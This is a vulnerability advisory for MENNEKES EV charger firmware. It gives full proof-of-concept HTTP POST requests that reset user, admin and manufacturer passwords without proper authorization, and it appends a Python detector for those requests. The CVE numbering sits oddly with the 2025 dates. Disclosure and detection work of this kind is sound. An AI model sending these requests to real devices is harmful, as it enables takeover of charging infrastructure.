Vendor description
“For more than 80 years, MENNEKES has stood for quality electrical products and service throughout the world. When it comes to solutions that handle current intelligently and safely, we set the standard for innovation, quality, manufacturing and development.”
Source: https://www.mennekes.com/about/about-us
Vulnerable versions
Amtron Professional
Amtron Professional (Eichrecht)
Amedio Professional
Amtron Charge Control
Amtron Professional Twincharge
Smart-T PnC
Vulnerability overview
1) Authentication Bypass (CVE-2026-8979)
An unauthenticated attacker can use a crafted POST request to change the password of the user account.
2) Privilege Escalation (CVE-2026-8980)
An authenticated attacker with a low-privileged account can use a crafted POST request to change the passwords of the manufacturer and admin accounts.
Proof of Concept
1) Authentication Bypass (CVE-2026-8979)
The following POST request can be used to change the password of the user account to “asdf”:
POST /operator/operator HTTP/1.1
Host: 10.201.74.66
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

UserPwdPlain_custom=asdf
2) Privilege Escalation (CVE-2026-8980)
The following POST requests can be used to change the admin (operator) and manufacturer account password to “asdf”.
POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 60
Authorization: e81179e1-5e50-45d4-8ee6-27161dcf69d8
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"params":[{"key":"OperatorPwdPlain_custom","value":"asd"}]}
POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 59
Authorization: 526ee807-4295-46f3-a9e4-0f4bcac97af9
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"params":[{"key":"ManufacturerPwd_custom","value":"asd"}]}
Solution
Update to the newest firmware.
Workaround
Restrict access to the device.
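While devices remain unpatched, the request patterns from the proof of concept can be watched for at a reverse proxy or in captured traffic. The following Python code is an added example, not part of the original advisory or any vendor tooling; it assumes raw request text is available, uses constructed sample data, and flags every write to these keys for review because the role behind an Authorization token cannot be determined from the request alone.

```python
import json
from urllib.parse import parse_qs

# Paths and parameter names are the ones in the advisory's requests.
FORM_KEYS = {"/operator/operator": {"UserPwdPlain_custom"}}
JSON_KEYS = {"/json/settings.json": {"OperatorPwdPlain_custom",
                                     "ManufacturerPwd_custom"}}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        return "", "", {}, ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1].split("?")[0], headers, body.strip()

def password_keys(method, path, body):
    """Return the password-setting keys the request tries to write."""
    if method != "POST":
        return []
    if path in FORM_KEYS:
        sent = set(parse_qs(body, keep_blank_values=True))
        return sorted(sent & FORM_KEYS[path])
    if path in JSON_KEYS:
        try:
            sent = {p.get("key") for p in json.loads(body)["params"]
                    if isinstance(p, dict)}
        except (ValueError, KeyError, TypeError):
            return []  # body is not the expected JSON shape
        return sorted(sent & JSON_KEYS[path])
    return []

def alert(raw, src):
    """Build an alert record; the submitted password is never copied."""
    method, path, headers, body = parse_request(raw)
    keys = password_keys(method, path, body)
    if not keys:
        return None
    return {"src": src, "path": path, "keys": keys,
            "has_authorization": "authorization" in headers}

# Constructed sample: addresses and value are placeholders.
SAMPLE = ("POST /operator/operator HTTP/1.1\r\nHost: 192.0.2.10\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "UserPwdPlain_custom=example")
if __name__ == "__main__":
    print(alert(SAMPLE, "198.51.100.7"))
```

An alert with `has_authorization` set to False on `/operator/operator` matches the unauthenticated pattern of the first finding; alerts on `/json/settings.json` should be correlated with which account owns the session.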
Technology Used
The vulnerabilities were manually verified on an emulated device by using “MEDUSA scalable firmware runtime” (www.medusa.re).
Contact Timeline
- 2025-02-24: Get in contact with psirt@mennekes.de
- 2025-02-25: Vulnerabilities get acknowledged and are forwarded to BENDER as they are the manufacturer for the devices.
- 2025-03-18: Ask for update regarding fixes, CVE numbers, fixed version and affected products. Response states that they will not create CVEs.
- 2025-05-28: Release of advisory.